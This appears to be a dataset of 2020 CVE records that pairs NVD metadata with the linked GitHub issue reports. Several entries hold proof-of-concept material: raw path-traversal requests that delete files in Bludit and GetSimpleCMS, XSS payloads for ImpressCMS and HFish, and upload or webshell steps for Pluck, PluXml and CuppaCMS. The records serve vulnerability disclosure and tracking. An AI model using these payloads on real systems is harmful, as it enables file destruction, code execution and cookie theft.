Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability in the management file interface.
https://api.github.com/repos/pluck-cms/pluck/issues/83/comments
5
2019-10-21T09:08:10Z
2020-05-01T07:25:08Z
https://github.com/pluck-cms/pluck/issues/83
509,831,136
83
1,448
CVE-2020-21564
2020-09-30T18:15:24.303
An issue was discovered in Pluck CMS 4.7.10-dev2 and 4.7.11. There is a file upload vulnerability that can cause a remote command execution via admin.php?action=files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/83" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*", "matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "434" ]
434
https://github.com/pluck-cms/pluck/issues/91
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files Proof step1: login -> pages -> manage files upload .htaccess file to turn files/.htaccess to .htaccess.txt ![图片](https://user-images.githubusercontent.com/48854942/71186014-6cec3380-22b7-11ea-9557-3e257ec201ae.png) ...
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files
https://api.github.com/repos/pluck-cms/pluck/issues/91/comments
10
2019-12-19T15:37:06Z
2024-11-01T13:16:25Z
https://github.com/pluck-cms/pluck/issues/91
540,390,005
91
1,449
CVE-2020-22481
2020-09-30T18:15:24.367
An issue was discovered in HFish 0.5.1. When a payload is inserted where the password is entered, XSS code is triggered when the administrator views the information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hacklcx/HFish/issues/69" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hack:hfish:0.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "A86390E8-D92B-42F3-BFA7-25701D161E0C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding":...
[ "79" ]
79
https://github.com/hacklcx/HFish/issues/69
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hacklcx", "HFish" ]
In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks. Insert XSS payload where the password is entered ![image](https://user-images.githubusercontent.com/39295496/76696266-6443a780-66c4-11ea-9ebd-53c834412a67.png) XSS code is triggered when the administrator ...
XSS exists in the information,can get cookie
https://api.github.com/repos/hacklcx/HFish/issues/69/comments
1
2020-03-15T05:35:23Z
2024-05-26T23:23:17Z
https://github.com/hacklcx/HFish/issues/69
581,528,388
69
1,450
CVE-2020-26148
2020-09-30T18:15:26.960
md_push_block_bytes in md4c.c in md4c 0.4.5 allows attackers to trigger use of uninitialized memory, and cause a denial of service (e.g., assertion failure) via a malformed Markdown document.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/mity/md4c/issues/130" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:md4c_project:md4c:0.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "7F455F90-1697-439A-AD24-E7CFFA64C195", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "908" ]
908
https://github.com/mity/md4c/issues/130
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "mity", "md4c" ]
Hi, While fuzzing md4c 0.4.5 with Honggfuzz, I found out that the md_push_block_bytes() function may use uninitialized memory. Attaching a reproducer (gzipped so GitHub accepts it): [test01.md.gz](https://github.com/mity/md4c/files/5298987/test01.md.gz) Issue can be reproduced by running: ``` md2html test0...
Use of uninitialized value in the md_push_block_bytes() function
https://api.github.com/repos/mity/md4c/issues/130/comments
5
2020-09-29T12:42:58Z
2020-09-29T21:54:14Z
https://github.com/mity/md4c/issues/130
711,076,103
130
1,451
CVE-2020-18185
2020-10-02T13:15:12.487
class.plx.admin.php in PluXml 5.7 allows attackers to execute arbitrary PHP code by modify the configuration file in a linux environment.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluxml/PluXml/issues/321" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.co...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluxml:pluxml:5.7:*:*:*:*:*:*:*", "matchCriteriaId": "72A017D0-5597-48A0-827E-B3466870F200", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "94" ]
94
https://github.com/pluxml/PluXml/issues/321
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluxml", "PluXml" ]
class.plx.admin.php in PluXml allows attackers to execute arbitrary PHP code by modify the configuration file. Source /PluXml/core/lib/class.plx.admin.php line 129~140: ``` if(isset($content['config_path'])) { $newpath=trim($content['config_path']); if($newpath!=PLX_CONFIG_PATH)...
An vulnerability that can get a webshell
https://api.github.com/repos/pluxml/PluXml/issues/321/comments
10
2019-02-18T06:12:50Z
2023-01-20T21:21:52Z
https://github.com/pluxml/PluXml/issues/321
411,316,776
321
1,452
CVE-2020-18190
2020-10-02T14:15:12.657
Bludit v3.8.1 is affected by directory traversal. Remote attackers are able to delete arbitrary files via /admin/ajax/upload-profile-picture.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/978" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "20051CC0-35E9-4FC7-ABE1-BC02C7CF7656", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "22" ]
22
https://github.com/bludit/bludit/issues/978
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
Hi There. I found Bludit v3.8.1 allows remote attackers to delete arbitrary files via /admin/ajax/upload-profile-picture. payload: ``` POST /bludit-3-8-1/admin/ajax/upload-profile-picture HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: ...
Arbitrary File Delete - Security
https://api.github.com/repos/bludit/bludit/issues/978/comments
3
2019-03-05T02:50:16Z
2019-03-29T13:49:45Z
https://github.com/bludit/bludit/issues/978
417,089,224
978
1,453
CVE-2020-18191
2020-10-02T14:15:12.733
GetSimpleCMS-3.3.15 is affected by directory traversal. Remote attackers are able to delete arbitrary files via /GetSimpleCMS-3.3.15/admin/log.php
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimplecms:3.3.15:*:*:*:*:*:*:*", "matchCriteriaId": "CFE148BE-5E47-42AB-8660-C0F033D83EC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "22" ]
22
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303
[ "Exploit", "Third Party Advisory" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
Hi There. I found GetSimpleCMS-3.3.15 allows remote attackers to delete arbitrary files via /GetSimpleCMS-3.3.15/admin/log.php payload: ``` GET /GetSimpleCMS-3.3.15/admin/log.php?log=../../../admin/cron.php&action=delete&nonce=babc600c8b8302dfd822f7eba42f846c3ddbb8a5 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla...
Arbitrary File Delete - Security
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1303/comments
8
2019-03-05T08:11:53Z
2019-03-05T18:14:21Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303
417,168,746
1,303
1,454
CVE-2017-18924
2020-10-04T05:15:12.140
oauth2-server (aka node-oauth2-server) through 3.1.1 implements OAuth 2.0 without PKCE. It does not prevent authorization code injection. This is similar to CVE-2020-7692. NOTE: the vendor states 'As RFC7636 is an extension, I think the claim in the Readme of "RFC 6749 compliant" is valid and not misleading and I also ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://codeburst.io/missing-the-point-in-securing-oauth-2-0-83968708b467" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/oauthjs/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oauth2-server_project:oauth2-server:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "7FFE5BBB-4620-482D-A32F-D416AA7E4ADA", "versionEndExcluding": null, "versionEndIncluding": "3.1.1", ...
[ "94" ]
94
https://github.com/oauthjs/node-oauth2-server/issues/637
[ "Exploit", "Third Party Advisory" ]
github.com
[ "oauthjs", "node-oauth2-server" ]
I would like to report several security vulnerabilities that I found while using this OAuth server library. The vulnerabilities and their consequences are listed as following: **Vulnerability 1:** Missing PKCE support for public clients. **_Consequences:_** As specified in RFC-7636 (https://tools.ietf.org/htm...
Multiple Security Vulnerabilities in Auth and Token Endpoint
https://api.github.com/repos/oauthjs/node-oauth2-server/issues/637/comments
6
2020-07-16T00:26:02Z
2021-11-21T02:41:44Z
https://github.com/oauthjs/node-oauth2-server/issues/637
657,747,248
637
1,455
CVE-2020-25636
2020-10-05T13:15:13.490
A flaw was found in Ansible Base when using the aws_ssm connection plugin as there is no namespace separation for file transfers. Files are written directly to the root bucket, making possible to have collisions when running multiple ansible processes. This issue affects mainly the service availability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.6, "confidentialityImpact": "NONE", ...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25636" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible-c...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:2.10.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "9C88089F-2A0A-4D2E-915B-C58D7402821C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "552" ]
552
https://github.com/ansible-collections/community.aws/issues/221
[ "Third Party Advisory" ]
github.com
[ "ansible-collections", "community.aws" ]
##### SUMMARY The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. It writes these files directly to the root of the bucket. If multiple ansible processes are running and sharing the same bucket at the same time, collisions could happen. ##### ISSUE TYPE - Bug Report ##### COMPONEN...
aws_ssm connection plugin should namespace its file transfers
https://api.github.com/repos/ansible-collections/community.aws/issues/221/comments
0
2020-09-04T15:15:07Z
2020-10-11T21:34:51Z
https://github.com/ansible-collections/community.aws/issues/221
693,282,141
221
1,456
CVE-2020-25635
2020-10-05T14:15:13.217
A flaw was found in Ansible Base when using the aws_ssm connection plugin as garbage collector is not happening after playbook run is completed. Files would remain in the bucket exposing the data. This issue affects directly data confidentiality.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", ...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25635" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible-c...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:2.10.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "9C88089F-2A0A-4D2E-915B-C58D7402821C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "212" ]
212
https://github.com/ansible-collections/community.aws/issues/222
[ "Third Party Advisory" ]
github.com
[ "ansible-collections", "community.aws" ]
##### SUMMARY The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. These files remain in the bucket after the play has complete, they are never removed. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME aws_ssm connection plugin ##### ANSIBLE VERSION ansible 2.10.1rc2 conf...
aws_ssm connection plugin should garbage collect the s3 bucket after the file transfers
https://api.github.com/repos/ansible-collections/community.aws/issues/222/comments
1
2020-09-04T15:25:10Z
2020-10-02T18:37:38Z
https://github.com/ansible-collections/community.aws/issues/222
693,296,526
222
1,457
CVE-2020-26048
2020-10-05T15:15:12.170
The file manager option in CuppaCMS before 2019-11-12 allows an authenticated attacker to upload a malicious file within an image extension and through a custom request using the rename function provided by the file manager is able to modify the image extension into PHP resulting in remote arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/7" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:*:*:*:*:*:*:*:*", "matchCriteriaId": "D8ED1BEA-DDC5-4FB0-BD5B-B8BED225773A", "versionEndExcluding": "2019-11-12", "versionEndIncluding": null, "versionStart...
[ "434" ]
434
https://github.com/CuppaCMS/CuppaCMS/issues/7
[ "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Affected software: CuppaCMS Type of vulnerability: Remote code execution Discovered by: Yosri Debaibi ## Description: The file manager option allows admin users to upload images to the application, the rename function could be altered by the users, An authenticated attacker is able to upload a malicious file...
Authenticated Remote code Execution
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/7/comments
5
2019-11-01T17:33:20Z
2020-12-10T09:56:08Z
https://github.com/CuppaCMS/CuppaCMS/issues/7
516,250,138
7
1,458
CVE-2020-17551
2020-10-07T17:15:13.287
ImpressCMS 1.4.0 is affected by XSS in modules/system/admin.php which may result in arbitrary remote code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/ImpressCMS/impresscms/issues/659" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.impresscms.org/" }, { "source": "af854a3a-2127-...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:impresscms:impresscms:1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "92D3930A-EBB1-4375-802C-34E837CCF918", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "79" ]
79
https://github.com/ImpressCMS/impresscms/issues/659
[ "Exploit", "Vendor Advisory" ]
github.com
[ "ImpressCMS", "impresscms" ]
Payload = **<script>alert('AppleBois');</script>** Vulnerable URL :modules/system/admin.php?fct=adsense&op=mod&adsenseid=4 Vulnerable TextBar : ID of the [adsense tag to display this ad] Vulnerable URL :/modules/system/admin.php?fct=customtag&op=mod Vulnerable TextBar : Name Reference https://medium.com/@t...
Stored XSS on ImpressCMS 1.4.0
https://api.github.com/repos/ImpressCMS/impresscms/issues/659/comments
11
2020-06-18T23:49:04Z
2020-07-07T11:04:40Z
https://github.com/ImpressCMS/impresscms/issues/659
641,612,977
659
1,459